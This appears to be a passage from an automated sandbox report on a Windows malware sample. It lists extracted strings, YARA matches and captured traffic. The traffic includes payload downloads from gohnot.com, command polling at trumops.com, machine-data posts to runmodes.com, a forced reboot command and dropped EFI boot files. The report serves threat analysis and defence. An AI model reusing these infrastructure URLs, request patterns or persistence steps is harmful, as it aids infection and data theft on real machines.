        Source: svchost.exe, 0000001F.00000003.417632468.000002A19898C000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.facebook.com (Facebook)
        Source: svchost.exe, 0000001F.00000003.417632468.000002A19898C000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.twitter.com (Twitter)
        Source: svchost.exe, 0000001F.00000003.417671941.000002A19899D000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ
","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-10-29T13:27:37.0950019Z||.||b9c681af-ac5a-4a25-a010-7b8f06b1a611||1152921505694056387||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
        Source: upd.exe, csrss.exeString found in binary or memory: .30 Version/10.61facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)tls: received unexpected handshake message of type %T when waiting for %TBlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103Mozilla/5.0 (Windows NT equals www.facebook.com (Facebook)
        Source: upd.exe, csrss.exeString found in binary or memory: lla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)2695994666715063979466701508701962594045780771442439172168272236806126959946667150639794667015087019630673557916260026308143510066 equals www.facebook.com (Facebook)
        Source: upd.exe, csrss.exeString found in binary or memory: http://archive.org/details/archive.org_bot)Mozilla/5.0
        Source: upd.exe, csrss.exeString found in binary or memory: http://builtwith.com/biup)
        Source: upd.exe.0.drString found in binary or memory: http://crl.g
        Source: upd.exe, 00000005.00000002.321059486.00000000009FB000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349015905.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.563763292.00000000009FB000.00000040.00020000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
        Source: upd.exe, 00000005.00000002.321059486.00000000009FB000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349015905.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.563763292.00000000009FB000.00000040.00020000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
        Source: upd.exe, 00000005.00000002.321059486.00000000009FB000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349015905.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.563763292.00000000009FB000.00000040.00020000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
        Source: svchost.exe, 0000001F.00000002.434211231.000002A198900000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: svchost.exe, 0000001F.00000002.434211231.000002A198900000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
        Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
        Source: upd.exe, csrss.exeString found in binary or memory: http://gais.cs.ccu.edu.tw/robot.php)Gulper
        Source: csrss.exe, 0000000B.00000002.568303341.00000000119AA000.00000004.00000001.sdmp, Null.11.drString found in binary or memory: http://gohnot.com/d28daa3fb329cff58b19acdf478b7882
        Source: 0NlSa5bf55.exe, 00000000.00000002.313848817.000000001140C000.00000004.00000001.sdmpString found in binary or memory: http://gohnot.com/d28daa3fb329cff58b19acdf478b7882/app.exe
        Source: csrss.exe, 0000000B.00000003.410949738.0000000011936000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000003.410362846.00000000119AE000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000003.412650413.0000000011864000.00000004.00000001.sdmp, Null.11.drString found in binary or memory: http://gohnot.com/d28daa3fb329cff58b19acdf478b7882/watchdog.exe
        Source: 0NlSa5bf55.exe, 00000000.00000002.313848817.000000001140C000.00000004.00000001.sdmpString found in binary or memory: http://gohnot.com/d28daa3fb329cff58b19acdf478b7882:s
        Source: upd.exe, csrss.exeString found in binary or memory: http://grub.org)Mozilla/5.0
        Source: svchost.exe, 0000001F.00000003.409018705.000002A19897E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.408832984.000002A198990000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
        Source: upd.exe, csrss.exeString found in binary or memory: http://help.ya
        Source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmpString found in binary or memory: http://https://_bad_pdb_file.pdb
        Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna:
        Source: upd.exe, csrss.exeString found in binary or memory: http://misc.yahoo.com.cn/he
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://newscommer.com/app/app.exe
        Source: svchost.exe, 0000000A.00000002.352136565.000001E387E7D000.00000004.00000001.sdmpString found in binary or memory: http://schemas.microsoft
        Source: upd.exe, csrss.exeString found in binary or memory: http://search.msn.com/msnb
        Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
        Source: csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)net/http:
        Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)pkcs7:
        Source: upd.exe, csrss.exeString found in binary or memory: http://www.alexa.com/help/webmasters;
        Source: upd.exe, csrss.exeString found in binary or memory: http://www.archive.org/details/archive.org_bot)Opera/9.80
        Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/00.62
        Source: upd.exe, csrss.exeString found in binary or memory: http://www.baidu.com/search/spide
        Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4
        Source: upd.exe, csrss.exeString found in binary or memory: http://www.bloglines.com)F
        Source: upd.exe, csrss.exeString found in binary or memory: http://www.everyfeed.c
        Source: upd.exe, csrss.exeString found in binary or memory: http://www.exabot.com/go/robot)Opera/9.80
        Source: upd.exe, csrss.exeString found in binary or memory: http://www.google.com/adsbot.html)Encountered
        Source: csrss.exe | String found in binary or memory: http://www.google.com/bot.html)Mozilla/5.0
        Source: upd.exe, csrss.exe | String found in binary or memory: http://www.google.com/bot.html)tls:
        Source: upd.exe, csrss.exe | String found in binary or memory: http://www.google.com/feedfetcher.html)HKLM
        Source: upd.exe, csrss.exe | String found in binary or memory: http://www.googlebot.com/bot.html)Links
        Source: upd.exe, csrss.exe | String found in binary or memory: http://www.spidersoft.com)Wget/1.9
        Source: upd.exe, csrss.exe | String found in binary or memory: http://yandex.com/bots)Opera/9.51
        Source: upd.exe, csrss.exe | String found in binary or memory: http://yandex.com/bots)Opera/9.80
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp | String found in binary or memory: https://blockchain.infoindex
        Source: svchost.exe, 0000001F.00000003.409018705.000002A19897E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.408832984.000002A198990000.00000004.00000001.sdmp | String found in binary or memory: https://disneyplus.com/legal.
        Source: upd.exe, csrss.exe | String found in binary or memory: https://humisnee.com/sbmstart.phpindefinite
        Source: csrss.exe, 0000000B.00000003.412056794.00000000118BE000.00000004.00000001.sdmp | String found in binary or memory: https://logs.trumops.com
        Source: csrss.exe, 0000000B.00000003.412056794.00000000118BE000.00000004.00000001.sdmp | String found in binary or memory: https://logs.trumops.comhttps://runmodes.com/api/loghttps://server2.trumops.com
        Source: upd.exe, csrss.exe | String found in binary or memory: https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsontls:
        Source: upd.exe, 00000005.00000002.323505653.00000000118BA000.00000004.00000001.sdmp, upd.exe, 00000008.00000002.351385142.0000000011810000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000002.566919363.0000000011804000.00000004.00000001.sdmp | String found in binary or memory: https://retoti.com
        Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp | String found in binary or memory: https://retoti.comidentifier
        Source: csrss.exe, 0000000B.00000003.412084318.00000000118C6000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000003.412056794.00000000118BE000.00000004.00000001.sdmp, Null.11.dr | String found in binary or memory: https://runmodes.com/api/log
        Source: csrss.exe, 0000000B.00000003.411869472.00000000118D6000.00000004.00000001.sdmp | String found in binary or memory: https://runmodes.com/api/log442b90d2-fde4-485f-a003-6086e2191d6e.uuid.trumops.com
        Source: csrss.exe, 0000000B.00000002.567515603.00000000118BE000.00000004.00000001.sdmp | String found in binary or memory: https://runmodes.com/api/logMachineGuidServiceVersionarch=64&build_number=17134&ec%3Af4%3Abb%3A86%3A
        Source: 0NlSa5bf55.exe, 0NlSa5bf55.exe, 00000000.00000002.310849116.0000000000401000.00000040.00020000.sdmp | String found in binary or memory: https://runmodes.com/api/loginvalid
        Source: 0NlSa5bf55.exe, 00000000.00000003.302106289.00000000114E2000.00000004.00000001.sdmp, 0NlSa5bf55.exe, 00000000.00000002.314895164.00000000114C0000.00000004.00000001.sdmp, 0NlSa5bf55.exe, 00000000.00000003.301759199.00000000115C2000.00000004.00000001.sdmp | String found in binary or memory: https://server16.trumops.com
        Source: 0NlSa5bf55.exe, 00000000.00000003.302123774.00000000114D6000.00000004.00000001.sdmp | String found in binary or memory: https://server16.trumops.com/api/cdn?c=dfd675dbadcd07bb&kind=main&uuid=
        Source: 0NlSa5bf55.exe, 00000000.00000002.314895164.00000000114C0000.00000004.00000001.sdmp | String found in binary or memory: https://server16.trumops.comc=dfd675dbadcd07bb&kind=main&server16.trumops.com:443server16.trumops.co
        Source: csrss.exe, 0000000B.00000003.412084318.00000000118C6000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000003.412056794.00000000118BE000.00000004.00000001.sdmp, Null.11.dr | String found in binary or memory: https://server2.trumops.com
        Source: csrss.exe, 0000000B.00000003.410338670.00000000119DE000.00000004.00000001.sdmp | String found in binary or memory: https://server2.trumops.com/api/cdn?c=fa2e76e6e1aa03da&uuid=442b90d2-fde4-485f-a003-6086e2191d6e
        Source: csrss.exe, 0000000B.00000002.567910236.0000000011926000.00000004.00000001.sdmp | String found in binary or memory: https://server2.trumops.com/api/poll
        Source: csrss.exe, 0000000B.00000002.567910236.0000000011926000.00000004.00000001.sdmp | String found in binary or memory: https://server2.trumops.com/api/pollE
        Source: csrss.exe, 0000000B.00000002.567910236.0000000011926000.00000004.00000001.sdmp | String found in binary or memory: https://server2.trumops.com/api/pollserver2.trumops.com
        Source: csrss.exe, 0000000B.00000003.410338670.00000000119DE000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000002.568351371.00000000119DE000.00000004.00000001.sdmp | String found in binary or memory: https://server2.trumops.com/bots/post-ia-data?uuid=442b90d2-fde4-485f-a003-6086e2191d6e
        Source: csrss.exe, 0000000B.00000002.568492280.0000000011A78000.00000004.00000001.sdmp | String found in binary or memory: https://server2.trumops.comc=fa2e76e6e1aa03da&uuid=server2.trumops.com:443server2.trumops.com:443tcp
        Source: csrss.exe, 0000000B.00000002.567515603.00000000118BE000.00000004.00000001.sdmp | String found in binary or memory: https://server2.trumops.comhttps://server2.trumops.comserver2.trumops.com:443ultserver2.trumops.com:
        Source: csrss.exe, 0000000B.00000003.410492385.00000000119AC000.00000004.00000001.sdmp | String found in binary or memory: https://server2.trumops.comserver2.trumops.com:443server2.trumops.com:443tcpserver2.trumops.com
        Source: csrss.exe, 0000000B.00000002.568492280.0000000011A78000.00000004.00000001.sdmp | String found in binary or memory: https://server2.trumops.comserver2.trumops.com:443server2.trumops.com:443tcpserver2.trumops.coma
        Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp | String found in binary or memory: https://sitescore.aiValue
        Source: csrss.exe, 0000000B.00000002.567045543.0000000011846000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000002.566919363.0000000011804000.00000004.00000001.sdmp, Null.11.dr | String found in binary or memory: https://trumops.com
        Source: upd.exe, csrss.exe | String found in binary or memory: https://trumops.com/api/install-failureinvalid
        Source: upd.exe, 00000005.00000002.323457865.00000000118AE000.00000004.00000001.sdmp | String found in binary or memory: https://trumops.comServiceVersionServiceVersionServersVersionServersVersionDistributorIDCampaignIDOS
        Source: upd.exe, 00000005.00000002.323617755.00000000118CE000.00000004.00000001.sdmp, upd.exe, 00000005.00000002.323544402.00000000118BE000.00000004.00000001.sdmp | String found in binary or memory: https://trumops.comhttps://retoti.comS-1-5-21-3853321935-2125563209-4053062332-1002
        Source: upd.exe, 00000005.00000002.323505653.00000000118BA000.00000004.00000001.sdmp | String found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInsta
        Source: upd.exe, 00000008.00000002.351356403.000000001180A000.00000004.00000001.sdmp | String found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-212556
        Source: csrss.exe, 0000000B.00000002.566919363.0000000011804000.00000004.00000001.sdmp | String found in binary or memory: https://trumops.comhttps://retoti.commusnotifyicon.exeRuntimeBroker.exersionruntimebroker.exeSgrmBro
        Source: 0NlSa5bf55.exe, 0NlSa5bf55.exe, 00000000.00000002.310849116.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp | String found in binary or memory: https://trumops.comif-unmodified-sinceillegal
        Source: upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp | String found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)gentraceback
        Source: svchost.exe, 0000001F.00000003.409018705.000002A19897E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.408832984.000002A198990000.00000004.00000001.sdmp | String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
        Source: svchost.exe, 0000001F.00000003.409018705.000002A19897E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.408832984.000002A198990000.00000004.00000001.sdmp | String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
        Source: svchost.exe, 0000001F.00000003.410486166.000002A198986000.00000004.00000001.sdmp | String found in binary or memory: https://www.tiktok.com/legal/report/
        Source: svchost.exe, 0000001F.00000003.410443706.000002A1989AE000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.410486166.000002A198986000.00000004.00000001.sdmp | String found in binary or memory: https://www.tiktok.com/legal/report/feedback
        Source: unknown | HTTP traffic detected: POST /api/log HTTP/1.1 Host: runmodes.com User-Agent: Go-http-client/1.1 Content-Length: 192 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip
        Source: unknown | DNS traffic detected: queries for: runmodes.com
        Source: global traffic | HTTP traffic detected: GET /api/cdn?c=dfd675dbadcd07bb&kind=main&uuid= HTTP/1.1 Host: server16.trumops.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
        Source: global traffic | HTTP traffic detected: GET /api/cdn?c=fa2e76e6e1aa03da&uuid=442b90d2-fde4-485f-a003-6086e2191d6e HTTP/1.1 Host: server2.trumops.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
        Source: global traffic | HTTP traffic detected: GET /d28daa3fb329cff58b19acdf478b7882/app.exe HTTP/1.1 Host: gohnot.com User-Agent: Go-http-client/1.1 Uuid: Accept-Encoding: gzip
        Source: global traffic | HTTP traffic detected: GET /d28daa3fb329cff58b19acdf478b7882/watchdog.exe HTTP/1.1 Host: gohnot.com User-Agent: Go-http-client/1.1 Uuid: 442b90d2-fde4-485f-a003-6086e2191d6e Version: 183 Accept-Encoding: gzip
        Source: upd.exe, 00000005.00000002.321801363.0000000000FE8000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

        System Summary:

        Uses shutdown.exe to shutdown or reboot the system
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
        Source: 0NlSa5bf55.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, RELOCS_STRIPPED
        Source: 5.2.upd.exe.9ad080.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
        Source: 8.2.upd.exe.9af2e0.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
        Source: 8.2.upd.exe.9a76e0.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
        Source: 8.2.upd.exe.9ad080.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
        Source: 11.2.csrss.exe.9ad080.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
        Source: 11.2.csrss.exe.9a76e0.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
        Source: 5.2.upd.exe.9af2e0.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
        Source: 5.2.upd.exe.9a76e0.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
        Source: 11.2.csrss.exe.9af2e0.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
        Source: C:\Users\user\Desktop\upd.exe | File created: C:\Windows\rss
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019B27F0
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019D8A4C
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019CC25C
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019B41F0
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019C7950
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019DA174
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019D74FC
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019D03B0
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019D5C10
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019B3370
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019C8549
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019CD558
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019CF908
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019D48D8
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019C58EC
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019C8040
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019C4830
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019D2864
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Code function: 36_2_00007FF7019CF070
        Source: EfiGuardDxe.efi.11.dr | Static PE information: No import functions for PE file found
        Source: bootmgfw.efi.11.dr | Static PE information: No import functions for PE file found
        Source: bootx64.efi.11.dr | Static PE information: No import functions for PE file found
        Source: C:\Windows\SysWOW64\sc.exe | Process token adjusted: Security
        Source: 0NlSa5bf55.exe | Virustotal: Detection: 66%
        Source: 0NlSa5bf55.exe | ReversingLabs: Detection: 64%
        Source: C:\Users\user\Desktop\0NlSa5bf55.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknown | Process created: C:\Users\user\Desktop\0NlSa5bf55.exe "C:\Users\user\Desktop\0NlSa5bf55.exe"
        Source: C:\Users\user\Desktop\0NlSa5bf55.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
